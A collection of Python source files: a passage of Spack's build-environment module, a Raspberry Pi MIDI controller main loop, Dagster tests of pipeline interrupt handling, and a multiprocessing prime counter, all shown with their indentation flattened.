# implicit variables
env.set(flag.upper(), ' '.join(f for f in env_flags[flag]))
pkg.flags_to_build_system_args(build_system_flags)
env.set('SPACK_COMPILER_SPEC', str(spec.compiler))
env.set('SPACK_SYSTEM_DIRS', ':'.join(system_dirs))
compiler.setup_custom_environment(pkg, env)
return env
def set_build_environment_variables(pkg, env, dirty):
"""Ensure a clean install environment when we build packages.
This involves unsetting pesky environment variables that may
affect the build. It also involves setting environment variables
used by Spack's compiler wrappers.
Args:
pkg: The package we are building
env: The build environment
dirty (bool): Skip unsetting the user's environment settings
"""
# Gather information about various types of dependencies
build_deps = set(pkg.spec.dependencies(deptype=('build', 'test')))
link_deps = set(pkg.spec.traverse(root=False, deptype=('link')))
build_link_deps = build_deps | link_deps
rpath_deps = get_rpath_deps(pkg)
link_dirs = []
include_dirs = []
rpath_dirs = []
# The top-level package is always RPATHed. It hasn't been installed yet
# so the RPATHs are added unconditionally (e.g. even though lib64/ may
# not be created for the install).
for libdir in ['lib', 'lib64']:
lib_path = os.path.join(pkg.prefix, libdir)
rpath_dirs.append(lib_path)
# Set up link, include, RPATH directories that are passed to the
# compiler wrapper
for dep in link_deps:
if is_system_path(dep.prefix):
continue
query = pkg.spec[dep.name]
dep_link_dirs = list()
try:
dep_link_dirs.extend(query.libs.directories)
except NoLibrariesError:
tty.debug("No libraries found for {0}".format(dep.name))
for default_lib_dir in ['lib', 'lib64']:
default_lib_prefix = os.path.join(dep.prefix, default_lib_dir)
if os.path.isdir(default_lib_prefix):
dep_link_dirs.append(default_lib_prefix)
link_dirs.extend(dep_link_dirs)
if dep in rpath_deps:
rpath_dirs.extend(dep_link_dirs)
try:
include_dirs.extend(query.headers.directories)
except NoHeadersError:
tty.debug("No headers found for {0}".format(dep.name))
link_dirs = list(dedupe(filter_system_paths(link_dirs)))
include_dirs = list(dedupe(filter_system_paths(include_dirs)))
rpath_dirs = list(dedupe(filter_system_paths(rpath_dirs)))
env.set(SPACK_LINK_DIRS, ':'.join(link_dirs))
env.set(SPACK_INCLUDE_DIRS, ':'.join(include_dirs))
env.set(SPACK_RPATH_DIRS, ':'.join(rpath_dirs))
build_prefixes = [dep.prefix for dep in build_deps]
build_link_prefixes = [dep.prefix for dep in build_link_deps]
# add run-time dependencies of direct build-time dependencies:
for build_dep in build_deps:
for run_dep in build_dep.traverse(deptype='run'):
build_prefixes.append(run_dep.prefix)
# Filter out system paths: ['/', '/usr', '/usr/local']
# These paths can be introduced into the build when an external package
# is added as a dependency. The problem with these paths is that they often
# contain hundreds of other packages installed in the same directory.
# If these paths come first, they can overshadow Spack installations.
build_prefixes = filter_system_paths(build_prefixes)
build_link_prefixes = filter_system_paths(build_link_prefixes)
# Add dependencies to CMAKE_PREFIX_PATH
env.set_path('CMAKE_PREFIX_PATH', build_link_prefixes)
# Set environment variables if specified for
# the given compiler
compiler = pkg.compiler
env.extend(spack.schema.environment.parse(compiler.environment))
if compiler.extra_rpaths:
extra_rpaths = ':'.join(compiler.extra_rpaths)
env.set('SPACK_COMPILER_EXTRA_RPATHS', extra_rpaths)
# Add bin directories from dependencies to the PATH for the build.
for prefix in build_prefixes:
for dirname in ['bin', 'bin64']:
bin_dir = os.path.join(prefix, dirname)
if os.path.isdir(bin_dir):
env.prepend_path('PATH', bin_dir)
# Add spack build environment path with compiler wrappers first in
# the path. We add the compiler wrapper path, which includes default
# wrappers (cc, c++, f77, f90), AND a subdirectory containing
# compiler-specific symlinks. The latter ensures that builds that
# are sensitive to the *name* of the compiler see the right name when
# we're building with the wrappers.
#
# Conflicts on case-insensitive systems (like "CC" and "cc") are
# handled by putting one in the <build_env_path>/case-insensitive
# directory. Add that to the path too.
env_paths = []
compiler_specific = os.path.join(
spack.paths.build_env_path, pkg.compiler.name)
for item in [spack.paths.build_env_path, compiler_specific]:
env_paths.append(item)
ci = os.path.join(item, 'case-insensitive')
if os.path.isdir(ci):
env_paths.append(ci)
for item in env_paths:
env.prepend_path('PATH', item)
env.set_path(SPACK_ENV_PATH, env_paths)
# Working directory for the spack command itself, for debug logs.
if spack.config.get('config:debug'):
env.set(SPACK_DEBUG, 'TRUE')
env.set(SPACK_SHORT_SPEC, pkg.spec.short_spec)
env.set(SPACK_DEBUG_LOG_ID, pkg.spec.format('{name}-{hash:7}'))
env.set(SPACK_DEBUG_LOG_DIR, spack.main.spack_working_dir)
# Find ccache binary and hand it to build environment
if spack.config.get('config:ccache'):
ccache = Executable('ccache')
if not ccache:
raise RuntimeError("No ccache binary found in PATH")
env.set(SPACK_CCACHE_BINARY, ccache)
# Add any pkgconfig directories to PKG_CONFIG_PATH
for prefix in build_link_prefixes:
for directory in ('lib', 'lib64', 'share'):
pcdir = os.path.join(prefix, directory, 'pkgconfig')
if os.path.isdir(pcdir):
env.prepend_path('PKG_CONFIG_PATH', pcdir)
return env
def _set_variables_for_single_module(pkg, module):
"""Helper function to set module variables for single module."""
# Put a marker on this module so that it won't execute the body of this
# function again, since it is not needed
marker = '_set_run_already_called'
if getattr(module, marker, False):
return
jobs = spack.config.get('config:build_jobs', 16) if pkg.parallel else 1
jobs = min(jobs, multiprocessing.cpu_count())
m = module
m.make_jobs = jobs
# TODO: make these build deps that can be installed if not found.
m.make = MakeExecutable('make', jobs)
m.gmake = MakeExecutable('gmake', jobs)
m.scons = MakeExecutable('scons', jobs)
m.ninja = MakeExecutable('ninja', jobs)
# easy shortcut to os.environ
m.env = os.environ
# Find the configure script in the archive path
# Don't use which for this; we want to find it in the current dir.
m.configure = Executable('./configure')
m.meson = Executable('meson')
m.cmake = Executable('cmake')
m.ctest = MakeExecutable('ctest', jobs)
# Standard CMake arguments
m.std_cmake_args = spack.build_systems.cmake.CMakePackage._std_args(pkg)
m.std_meson_args = spack.build_systems.meson.MesonPackage._std_args(pkg)
# Put spack compiler paths in module scope.
link_dir = spack.paths.build_env_path
m.spack_cc = os.path.join(link_dir, pkg.compiler.link_paths['cc'])
m.spack_cxx = os.path.join(link_dir, pkg.compiler.link_paths['cxx'])
m.spack_f77 = os.path.join(link_dir, pkg.compiler.link_paths['f77'])
m.spack_fc = os.path.join(link_dir, pkg.compiler.link_paths['fc'])
# Emulate some shell commands for convenience
m.pwd = os.getcwd
m.cd = os.chdir
m.mkdir = os.mkdir
m.makedirs = os.makedirs
m.remove = os.remove
m.removedirs = os.removedirs
m.symlink = os.symlink
m.mkdirp = mkdirp
m.install = install
m.install_tree = install_tree
m.rmtree = shutil.rmtree
m.move = shutil.move
# Useful directories within the prefix are encapsulated in
# a Prefix object.
m.prefix = pkg.prefix
# Platform-specific library suffix.
m.dso_suffix = dso_suffix
def static_to_shared_library(static_lib, shared_lib=None, **kwargs):
compiler_path = kwargs.get('compiler', m.spack_cc)
compiler = Executable(compiler_path)
return _static_to_shared_library(pkg.spec.architecture, compiler,
static_lib, shared_lib, **kwargs)
m.static_to_shared_library = static_to_shared_library
# Put a marker on this module so that it won't execute the body of this
# function again, since it is not needed
setattr(m, marker, True)
def set_module_variables_for_package(pkg):
"""Populate the module scope of install() with some useful functions.
This makes things easier for package writers.
"""
# If a user makes their own package repo, e.g.
# spack.pkg.mystuff.libelf.Libelf, and they inherit from an existing class
# like spack.pkg.original.libelf.Libelf, then set the module variables
# for both classes so the parent class can still use them if it gets
# called. parent_class_modules includes pkg.module.
modules = parent_class_modules(pkg.__class__)
for mod in modules:
_set_variables_for_single_module(pkg, mod)
def _static_to_shared_library(arch, compiler, static_lib, shared_lib=None,
**kwargs):
"""
Converts a static library to a shared library. The static library has to
be built with PIC for the conversion to work.
Parameters:
static_lib (str): Path to the static library.
shared_lib (str): Path to the shared library. Default is to derive
from the static library's path.
Keyword arguments:
compiler (str): Path to the compiler. Default is spack_cc.
compiler_output: Where to print compiler output to.
arguments (str list): Additional arguments for the compiler.
version (str): Library version. Default is unspecified.
compat_version (str): Library compatibility version. Default is
version.
"""
compiler_output = kwargs.get('compiler_output', None)
arguments = kwargs.get('arguments', [])
version = kwargs.get('version', None)
compat_version = kwargs.get('compat_version', version)
if not shared_lib:
shared_lib = '{0}.{1}'.format(os.path.splitext(static_lib)[0],
dso_suffix)
compiler_args = []
# TODO: Compiler arguments should not be hardcoded but provided by
# the different compiler classes.
if 'linux' in arch or 'cray' in arch:
soname = os.path.basename(shared_lib)
if compat_version:
soname += '.{0}'.format(compat_version)
compiler_args = [
'-shared',
'-Wl,-soname,{0}'.format(soname),
'-Wl,--whole-archive',
static_lib,
'-Wl,--no-whole-archive'
]
elif 'darwin' in arch:
install_name = shared_lib
if compat_version:
install_name += '.{0}'.format(compat_version)
compiler_args = [
'-dynamiclib',
'-install_name', '{0}'.format(install_name),
'-Wl,-force_load,{0}'.format(static_lib)
]
if compat_version:
compiler_args.extend(['-compatibility_version', '{0}'.format(
compat_version)])
if version:
compiler_args.extend(['-current_version', '{0}'.format(version)])
if len(arguments) > 0:
compiler_args.extend(arguments)
shared_lib_base = shared_lib
if version:
shared_lib += '.{0}'.format(version)
elif compat_version:
shared_lib += '.{0}'.format(compat_version)
compiler_args.extend(['-o', shared_lib])
# Create symlinks for version and compat_version
shared_lib_link = os.path.basename(shared_lib)
if version or compat_version:
os.symlink(shared_lib_link, shared_lib_base)
if compat_version and compat_version != version:
os.symlink(shared_lib_link, '{0}.{1}'.format(shared_lib_base,
compat_version))
return compiler(*compiler_args, output=compiler_output)
def get_rpath_deps(pkg):
"""Return immediate or transitive RPATHs depending on the package."""
if pkg.transitive_rpaths:
return [d for d in pkg.spec.traverse(root=False, deptype=('link'))]
else:
return pkg.spec.dependencies(deptype='link')
def get_rpaths(pkg):
"""Get a list of all the rpaths for a package."""
rpaths = [pkg.prefix.lib, pkg.prefix.lib64]
deps = get_rpath_deps(pkg)
rpaths.extend(d.prefix.lib for d in deps
if os.path.isdir(d.prefix.lib))
rpaths.extend(d.prefix.lib64 for d in deps
if os.path.isdir(d.prefix.lib64))
# Second module is our compiler mod name. We use that to get rpaths from
# module show output.
if pkg.compiler.modules and len(pkg.compiler.modules) > 1:
rpaths.append(path_from_modules([pkg.compiler.modules[1]]))
return list(dedupe(filter_system_paths(rpaths)))
def get_std_cmake_args(pkg):
"""List of standard arguments used if a package is a CMakePackage.
Returns:
list of str: standard arguments that would be used if this
package were a CMakePackage instance.
Args:
pkg (PackageBase): package under consideration
Returns:
list of str: arguments for cmake
"""
return spack.build_systems.cmake.CMakePackage._std_args(pkg)
def get_std_meson_args(pkg):
"""List of standard arguments used if a package is a MesonPackage.
Returns:
list of str: standard arguments that would be used if this
package were a MesonPackage instance.
Args:
pkg (PackageBase): package under consideration
Returns:
list of str: arguments for meson
"""
return spack.build_systems.meson.MesonPackage._std_args(pkg)
def parent_class_modules(cls):
"""
Get list of superclass modules that descend from spack.package.PackageBase
Includes cls.__module__
"""
if (not issubclass(cls, spack.package.PackageBase) or
issubclass(spack.package.PackageBase, cls)):
return []
result = []
module = sys.modules.get(cls.__module__)
if module:
result = [module]
for c in cls.__bases__:
result.extend(parent_class_modules(c))
return result
def load_external_modules(pkg):
"""Traverse a package's spec DAG and load any external modules.
Traverse a package's dependencies and load any external modules
associated with them.
Args:
pkg (PackageBase): package to load deps for
"""
for dep in list(pkg.spec.traverse()):
external_modules = dep.external_modules or []
for external_module in external_modules:
load_module(external_module)
def setup_package(pkg, dirty, context='build'):
"""Execute all environment setup routines."""
env = EnvironmentModifications()
# clean environment
if not dirty:
clean_environment()
# setup compilers and build tools for build contexts
need_compiler = context == 'build' or (context == 'test' and
pkg.test_requires_compiler)
if need_compiler:
set_compiler_environment_variables(pkg, env)
set_build_environment_variables(pkg, env, dirty)
# architecture specific setup
pkg.architecture.platform.setup_platform_environment(pkg, env)
if context == 'build':
# recursive post-order dependency information
env.extend(
modifications_from_dependencies(pkg.spec, context=context)
)
if (not dirty) and (not env.is_unset('CPATH')):
tty.debug("A dependency has updated CPATH, this may lead pkg-config"
" to assume that the package is part of the system"
" includes and omit it when invoked with '--cflags'.")
# setup package itself
set_module_variables_for_package(pkg)
pkg.setup_build_environment(env)
elif context == 'test':
import spack.user_environment as uenv # avoid circular import
env.extend(uenv.environment_modifications_for_spec(pkg.spec))
set_module_variables_for_package(pkg)
env.prepend_path('PATH', '.')
# Loading modules, in particular if they are meant to be used outside
# of Spack, can change environment variables that are relevant to the
# build of packages. To avoid a polluted environment, preserve the
# value of a few, selected, environment variables
# With the current ordering of environment modifications, this is strictly
# unnecessary. Modules affecting these variables will be overwritten anyway
with preserve_environment('CC', 'CXX', 'FC', 'F77'):
# All module loads that otherwise would belong in previous
# functions have to occur after the env object has its
# modifications applied. Otherwise the environment modifications
# could undo module changes, such as unsetting LD_LIBRARY_PATH
# after a module changes it.
if need_compiler:
for mod in pkg.compiler.modules:
# Fixes issue https://github.com/spack/spack/issues/3153
if os.environ.get("CRAY_CPU_TARGET") == "mic-knl":
load_module("cce")
load_module(mod)
# kludge to handle cray libsci being automatically loaded by PrgEnv
# modules on cray platform. Module unload does no damage when
# unnecessary
module('unload', 'cray-libsci')
if pkg.architecture.target.module_name:
load_module(pkg.architecture.target.module_name)
load_external_modules(pkg)
implicit_rpaths = pkg.compiler.implicit_rpaths()
if implicit_rpaths:
env.set('SPACK_COMPILER_IMPLICIT_RPATHS',
':'.join(implicit_rpaths))
# Make sure nothing's strange about the Spack environment.
validate(env, tty.warn)
env.apply_modifications()
def modifications_from_dependencies(spec, context):
"""Returns the environment modifications that are required by
the dependencies of a spec and also applies modifications
to this spec's package at module scope, if need be.
Args:
spec (Spec): spec for which we want the modifications
context (str): either 'build' for build-time modifications or 'run'
for run-time modifications
"""
env = EnvironmentModifications()
pkg = spec.package
# Maps the context to deptype and method to be called
deptype_and_method = {
'build': (('build', 'link', 'test'),
'setup_dependent_build_environment'),
'run': (('link', 'run'), 'setup_dependent_run_environment'),
'test': (('link', 'run', 'test'), 'setup_dependent_run_environment')
}
deptype, method = deptype_and_method[context]
for dspec in spec.traverse(order='post', root=False, deptype=deptype):
dpkg = dspec.package
set_module_variables_for_package(dpkg)
# Allow dependencies to modify the module
dpkg.setup_dependent_package(pkg.module, spec)
getattr(dpkg, method)(env, spec)
return env
def fork(pkg, function, dirty, fake, context='build', **kwargs):
"""Fork a child process to do part of a spack build.
Args:
pkg (PackageBase): package whose environment we should set up the
forked process for.
function (callable): argless function to run in the child
process.
dirty (bool): If True, do NOT clean the environment before
building.
fake (bool): If True, skip package setup b/c it's not a real build
context (string): If 'build', setup build environment. If 'test', setup
test environment.
Usage::
def child_fun():
# do stuff
build_env.fork(pkg, child_fun)
Forked processes are run with the build environment set up by
spack.build_environment. This allows package authors to have full
control over the environment, etc. without affecting other builds
that might be executed in the same spack call.
If something goes wrong, the child process catches the error and
passes it to the parent wrapped in a ChildError. The parent is
expected to handle (or re-raise) the ChildError.
"""
def child_process(child_pipe, input_stream):
# We are in the child process. Python sets sys.stdin to
# open(os.devnull) to prevent our process and its parent from
# simultaneously reading from the original stdin. But, we assume
# that the parent process is not going to read from it till we
# are done with the child, so we undo Python's precaution.
if input_stream is not None:
sys.stdin = input_stream
try:
if not fake:
setup_package(pkg, dirty=dirty, context=context)
return_value = function()
child_pipe.send(return_value)
except StopPhase as e:
# Do not create a full ChildError from this, it's not an error
# it's a control statement.
child_pipe.send(e)
except BaseException:
# catch ANYTHING that goes wrong in the child process
exc_type, exc, tb = sys.exc_info()
# Need to unwind the traceback in the child because traceback
# objects can't be sent to the parent.
tb_string = traceback.format_exc()
# build up some context from the offending package so we can
# show that, too.
if exc_type is not spack.install_test.TestFailure:
package_context = get_package_context(traceback.extract_tb(tb))
else:
package_context = []
build_log = None
if context == 'build' and hasattr(pkg, 'log_path'):
build_log = pkg.log_path
test_log = None
if context == 'test':
test_log = os.path.join(
pkg.test_suite.stage,
spack.install_test.TestSuite.test_log_name(pkg.spec))
# make a pickleable exception to send to parent.
msg = "%s: %s" % (exc_type.__name__, str(exc))
ce = ChildError(msg,
exc_type.__module__,
exc_type.__name__,
tb_string, package_context,
build_log, test_log)
child_pipe.send(ce)
finally:
child_pipe.close()
parent_pipe, child_pipe = multiprocessing.Pipe()
input_stream = None
try:
# Forward sys.stdin when appropriate, to allow toggling verbosity
if sys.stdin.isatty() and hasattr(sys.stdin, 'fileno'):
input_stream = os.fdopen(os.dup(sys.stdin.fileno()))
p = multiprocessing.Process(
target=child_process, args=(child_pipe, input_stream))
p.start()
except InstallError as e:
e.pkg = pkg
raise
finally:
# Close the input stream in the parent process
if input_stream is not None:
input_stream.close()
child_result = parent_pipe.recv()
p.join()
# If returns a StopPhase, raise it
if isinstance(child_result, StopPhase):
# do not print
raise child_result
# let the caller know which package went wrong.
if isinstance(child_result, InstallError):
child_result.pkg = pkg
if isinstance(child_result, ChildError):
# If the child process raised an error, print its output here rather
# than waiting until the call to SpackError.die() in main(). This
# allows exception handling output to be logged from within Spack.
# see spack.main.SpackCommand.
child_result.print_context()
raise child_result
return child_result
def get_package_context(traceback, context=3):
"""Return some context for an error message when the build fails.
Args:
traceback (list of tuples): output from traceback.extract_tb() or
traceback.extract_stack()
context (int): Lines of context to show before and after the line
where the error happened
This function inspects the stack to find where we failed in the
package file, and it adds detailed context to the long_message
from there.
"""
for filename, lineno, function, text in reversed(traceback):
if 'package.py' in filename or 'spack/build_systems' in filename:
if function not in ('run_test', '_run_test_helper'):
# We are in a package and not one of the listed methods
# We exclude these methods because we expect errors in them to
# be the result of user tests failing, and we show the tests
# instead.
break
# Package files have a line added at import time, so we adjust the lineno
# when we are getting context from a package file instead of a base class
adjust = 1 if spack.paths.is_package_file(filename) else 0
lineno = lineno - adjust
# We found obj, the Package implementation we care about.
# Point out the location in the install method where we failed.
lines = [
'{0}:{1:d}, in {2}:'.format(
filename,
lineno,
function
)
]
# Build a message showing context in the install method.
# Adjust for import mangling of package files.
with open(filename, 'r') as f:
sourcelines = f.readlines()
start = max(0, lineno - context - 1)
sourcelines = sourcelines[start:lineno + context + 1]
for i, line in enumerate(sourcelines):
i = i + adjust # adjusting for import munging again
is_error = start + i == lineno
mark = '>> ' if is_error else ' '
# Add start to get lineno relative to start of file, not function.
marked = ' {0}{1:-6d}{2}'.format(
mark, start + i, line.rstrip())
if is_error:
marked = colorize('@R{%s}' % cescape(marked))
lines.append(marked)
return lines
class InstallError(spack.error.SpackError):
"""Raised by packages when a package fails to install.
Any subclass of InstallError will be annotated by Spack wtih a
``pkg`` attribute on failure, which the caller can use to get the
package for which the exception was raised.
"""
class ChildError(InstallError):
"""Special exception class for wrapping exceptions from child processes
in Spack's build environment.
The main features of a ChildError are:
1. They're serializable, so when a child build fails, we can send one
of these to the parent and let the parent report what happened.
2. They have a ``traceback`` field containing a traceback generated
on the child immediately after failure. Spack will print this on
failure in lieu of trying to run sys.excepthook on the parent
process, so users will see the correct stack trace from a child.
3. They also contain context, which shows context in the Package
implementation where the error happened. This helps people debug
Python code in their packages. To get it, Spack searches the
stack trace for the deepest frame where ``self`` is in scope and
is an instance of PackageBase. This will generally find a useful
spot in the ``package.py`` file.
The long_message of a ChildError displays one of two things:
1. If the original error was a ProcessError, indicating a command
died during the build, we'll show context from the build log.
2. If the original error was any other type of error, we'll show
context from the Python code.
SpackError handles displaying the special traceback if we're in debug
mode with spack -d.
"""
# List of errors considered "build errors", for which we'll show log
# context instead of Python context.
build_errors = [('spack.util.executable', 'ProcessError')]
def __init__(self, msg, module, classname, traceback_string, context,
build_log, test_log):
super(ChildError, self).__init__(msg)
self.module = module
self.name = classname
self.traceback = traceback_string
self.context = context
self.build_log = build_log
self.test_log = test_log
@property
def long_message(self):
out = StringIO()
out.write(self._long_message if self._long_message else '')
if (self.module, self.name) in ChildError.build_errors:
# The error happened in some external executed process. Show
# the log with errors or warnings highlighted.
if self.build_log and os.path.exists(self.build_log):
write_log_summary(out, 'build', self.build_log)
if self.test_log and os.path.exists(self.test_log):
write_log_summary(out, 'test', self.test_log)
else:
# The error happened in in the Python code, so try to show
# some context from the Package itself.
if self.context:
out.write('\n')
out.write('\n'.join(self.context))
out.write('\n')
if out.getvalue():
out.write('\n')
if self.build_log and os.path.exists(self.build_log):
out.write('See build log for details:\n')
out.write(' %s\n' % self.build_log)
if self.test_log and os.path.exists(self.test_log):
out.write('See test log for details:\n')
out.write(' %s\n' % self.test_log)
return out.getvalue()
def __str__(self):
return self.message + self.long_message + self.traceback
def __reduce__(self):
"""__reduce__ is used to serialize (pickle) ChildErrors.
Return a function to reconstruct a ChildError, along with the
salient properties we'll need.
"""
return _make_child_error, (
self.message,
self.module,
self.name,
self.traceback,
self.context,
self.build_log,
self.test_log)
def _make_child_error(msg, module, name, traceback, context,
build_log, test_log):
"""Used by __reduce__ in ChildError to reconstruct pickled errors."""
return ChildError(msg, module, name, traceback, context,
build_log, test_log)
class StopPhase(spack.error.SpackError):
"""Pickle-able exception to control stopped builds."""
def __reduce__(self):
return _make_stop_phase, (self.message, self.long_message)
def _make_stop_phase(msg, long_msg):
return StopPhase(msg, long_msg)
def write_log_summary(out, log_type, log, last=None):
errors, warnings = parse_log_events(log)
nerr = len(errors)
nwar = len(warnings)
if nerr > 0:
if last and nerr > last:
errors = errors[-last:]
nerr = last
# If errors are found, only display errors
out.write(
"\n%s found in %s log:\n" %
(plural(nerr, 'error'), log_type))
out.write(make_log_context(errors))
elif nwar > 0:
if last and nwar > last:
warnings = warnings[-last:]
nwar = last
# If no errors are found but warnings are, display warnings
out.write(
"\n%s found in %s log:\n" %
(plural(nwar, 'warning'), log_type))
out.write(make_log_context(warnings))
|
midi_pi.py | import cProfile
import pstats
import sys
import time
from threading import Thread
from config import Config
from display import Display
from i2c import I2C
from leds import Leds
from midi_ports import MidiPorts
from music import Music
from power import Power
from server import Server
from util import niceTime, updatePendingActions
class MidiPi:
def __init__(self):
Config.load()
Music.init()
Leds.init()
I2C.init()
Power.init()
self.Display = Display()
self.serverThread = Thread(target=Server.init)
self.serverThread.daemon = True
self.serverThread.start()
print('Init Complete')
def update(self):
MidiPorts.update()
Config.update()
Leds.updateLeds()
Music.update()
self.Display.update()
updatePendingActions(self.Display)
def profile(self):
# Just wait for keyboard interrupt, everything else is handled via the input callback.
profile = cProfile.Profile()
profile.enable()
i = 0
while i < 300:
self.update()
i += 1
profile.disable()
ps = pstats.Stats(profile)
ps.print_stats()
if __name__ == "__main__":
try:
print(niceTime() + ': Entering main loop. Press Control-C to exit.')
midiPi = MidiPi()
while True:
if Config.PROFILING:
midiPi.profile()
break
midiPi.update()
# time.sleep(0.0005)
except:
print(sys.exc_info())
finally:
MidiPorts.cleanup()
Server.running = False
print('Exit') |
test_interrupt.py | import os
import signal
import tempfile
import time
from threading import Thread
import pytest
from dagster import (
DagsterEventType,
Field,
ModeDefinition,
String,
execute_pipeline_iterator,
pipeline,
reconstructable,
resource,
seven,
solid,
)
from dagster.core.errors import DagsterExecutionInterruptedError, raise_execution_interrupts
from dagster.core.test_utils import default_mode_def_for_test, instance_for_test
from dagster.utils import safe_tempfile_path, send_interrupt
from dagster.utils.interrupts import capture_interrupts, check_captured_interrupt
def _send_kbd_int(temp_files):
while not all([os.path.exists(temp_file) for temp_file in temp_files]):
time.sleep(0.1)
send_interrupt()
@solid(config_schema={"tempfile": Field(String)})
def write_a_file(context):
with open(context.solid_config["tempfile"], "w") as ff:
ff.write("yup")
start_time = time.time()
while (time.time() - start_time) < 30:
time.sleep(0.1)
raise Exception("Timed out")
@solid
def should_not_start(_context):
assert False
@pipeline(mode_defs=[default_mode_def_for_test])
def write_files_pipeline():
write_a_file.alias("write_1")()
write_a_file.alias("write_2")()
write_a_file.alias("write_3")()
write_a_file.alias("write_4")()
should_not_start.alias("x_should_not_start")()
should_not_start.alias("y_should_not_start")()
should_not_start.alias("z_should_not_start")()
def test_single_proc_interrupt():
@pipeline
def write_a_file_pipeline():
write_a_file()
with safe_tempfile_path() as success_tempfile:
# launch a thread the waits until the file is written to launch an interrupt
Thread(target=_send_kbd_int, args=([success_tempfile],)).start()
result_types = []
result_messages = []
# next time the launched thread wakes up it will send a keyboard
# interrupt
for result in execute_pipeline_iterator(
write_a_file_pipeline,
run_config={"solids": {"write_a_file": {"config": {"tempfile": success_tempfile}}}},
):
result_types.append(result.event_type)
result_messages.append(result.message)
assert DagsterEventType.STEP_FAILURE in result_types
assert DagsterEventType.PIPELINE_FAILURE in result_types
assert any(
[
"Execution was interrupted unexpectedly. "
"No user initiated termination request was found, treating as failure." in message
for message in result_messages
]
)
@pytest.mark.skipif(seven.IS_WINDOWS, reason="Interrupts handled differently on windows")
def test_interrupt_multiproc():
with tempfile.TemporaryDirectory() as tempdir:
with instance_for_test(temp_dir=tempdir) as instance:
file_1 = os.path.join(tempdir, "file_1")
file_2 = os.path.join(tempdir, "file_2")
file_3 = os.path.join(tempdir, "file_3")
file_4 = os.path.join(tempdir, "file_4")
# launch a thread that waits until the file is written to launch an interrupt
Thread(target=_send_kbd_int, args=([file_1, file_2, file_3, file_4],)).start()
results = []
# launch a pipeline that writes a file and loops infinitely
# next time the launched thread wakes up it will send a keyboard
# interrupt
for result in execute_pipeline_iterator(
reconstructable(write_files_pipeline),
run_config={
"solids": {
"write_1": {"config": {"tempfile": file_1}},
"write_2": {"config": {"tempfile": file_2}},
"write_3": {"config": {"tempfile": file_3}},
"write_4": {"config": {"tempfile": file_4}},
},
"execution": {"multiprocess": {"config": {"max_concurrent": 4}}},
},
instance=instance,
):
results.append(result)
assert [result.event_type for result in results].count(
DagsterEventType.STEP_FAILURE
) == 4
assert DagsterEventType.PIPELINE_FAILURE in [result.event_type for result in results]
def test_interrupt_resource_teardown():
called = []
cleaned = []
@resource
def resource_a(_):
try:
called.append("A")
yield "A"
finally:
cleaned.append("A")
@solid(config_schema={"tempfile": Field(String)}, required_resource_keys={"a"})
def write_a_file_resource_solid(context):
with open(context.solid_config["tempfile"], "w") as ff:
ff.write("yup")
while True:
time.sleep(0.1)
@pipeline(mode_defs=[ModeDefinition(resource_defs={"a": resource_a})])
def write_a_file_pipeline():
write_a_file_resource_solid()
with safe_tempfile_path() as success_tempfile:
# launch a thread the waits until the file is written to launch an interrupt
Thread(target=_send_kbd_int, args=([success_tempfile],)).start()
results = []
# launch a pipeline that writes a file and loops infinitely
# next time the launched thread wakes up it will send an interrupt
for result in execute_pipeline_iterator(
write_a_file_pipeline,
run_config={
"solids": {
"write_a_file_resource_solid": {"config": {"tempfile": success_tempfile}}
}
},
):
results.append(result.event_type)
assert DagsterEventType.STEP_FAILURE in results
assert DagsterEventType.PIPELINE_FAILURE in results
assert "A" in cleaned
def _send_interrupt_to_self():
os.kill(os.getpid(), signal.SIGINT)
start_time = time.time()
while not check_captured_interrupt():
time.sleep(1)
if time.time() - start_time > 15:
raise Exception("Timed out waiting for interrupt to be received")
@pytest.mark.skipif(seven.IS_WINDOWS, reason="Interrupts handled differently on windows")
def test_capture_interrupt():
outer_interrupt = False
inner_interrupt = False
with capture_interrupts():
try:
_send_interrupt_to_self()
except: # pylint: disable=bare-except
inner_interrupt = True
assert not inner_interrupt
# Verify standard interrupt handler is restored
standard_interrupt = False
try:
_send_interrupt_to_self()
except KeyboardInterrupt:
standard_interrupt = True
assert standard_interrupt
outer_interrupt = False
inner_interrupt = False
# No exception if no signal thrown
try:
with capture_interrupts():
try:
time.sleep(5)
except: # pylint: disable=bare-except
inner_interrupt = True
except: # pylint: disable=bare-except
outer_interrupt = True
assert not outer_interrupt
assert not inner_interrupt
@pytest.mark.skipif(seven.IS_WINDOWS, reason="Interrupts handled differently on windows")
def test_raise_execution_interrupts():
with raise_execution_interrupts():
try:
_send_interrupt_to_self()
except DagsterExecutionInterruptedError:
standard_interrupt = True
assert standard_interrupt
@pytest.mark.skipif(seven.IS_WINDOWS, reason="Interrupts handled differently on windows")
def test_interrupt_inside_nested_delay_and_raise():
interrupt_inside_nested_raise = False
interrupt_after_delay = False
try:
with capture_interrupts():
with raise_execution_interrupts():
try:
_send_interrupt_to_self()
except DagsterExecutionInterruptedError:
interrupt_inside_nested_raise = True
except: # pylint: disable=bare-except
interrupt_after_delay = True
assert interrupt_inside_nested_raise
assert not interrupt_after_delay
@pytest.mark.skipif(seven.IS_WINDOWS, reason="Interrupts handled differently on windows")
def test_no_interrupt_after_nested_delay_and_raise():
interrupt_inside_nested_raise = False
interrupt_after_delay = False
try:
with capture_interrupts():
with raise_execution_interrupts():
try:
time.sleep(5)
except: # pylint: disable=bare-except
interrupt_inside_nested_raise = True
_send_interrupt_to_self()
except: # pylint: disable=bare-except
interrupt_after_delay = True
assert not interrupt_inside_nested_raise
assert not interrupt_after_delay
@pytest.mark.skipif(seven.IS_WINDOWS, reason="Interrupts handled differently on windows")
def test_calling_raise_execution_interrupts_also_raises_any_captured_interrupts():
interrupt_from_raise_execution_interrupts = False
interrupt_after_delay = False
try:
with capture_interrupts():
_send_interrupt_to_self()
try:
with raise_execution_interrupts():
pass
except DagsterExecutionInterruptedError:
interrupt_from_raise_execution_interrupts = True
except: # pylint: disable=bare-except
interrupt_after_delay = True
assert interrupt_from_raise_execution_interrupts
assert not interrupt_after_delay
|
count_primes.py | import sys
from multiprocessing import Process, Value, Lock
def is_prime(n):
if n <= 1:
return False
if n <= 3:
return True
if n % 2 == 0 or n % 3 == 0:
return False
i = 5;
while i * i <= n:
if n % i == 0 or n % (i + 2) == 0:
return False
i += 6
return True
def worker(limit, counter, total_result, lock):
i = 2
result = 1
while i < limit:
with lock:
i = counter.value
counter.value += 1
if is_prime(i):
result += 1
with lock:
total_result.value += result
if __name__ == "__main__":
limit = int(sys.argv[1])
nthreads = int(sys.argv[2])
result = Value('i', 0)
counter = Value('i', 0)
lock = Lock()
workers = [Process(target=worker, args=(limit, counter, result, lock)) for i in range(nthreads)]
for w in workers:
w.start()
for w in workers:
w.join()
print(result.value)
|
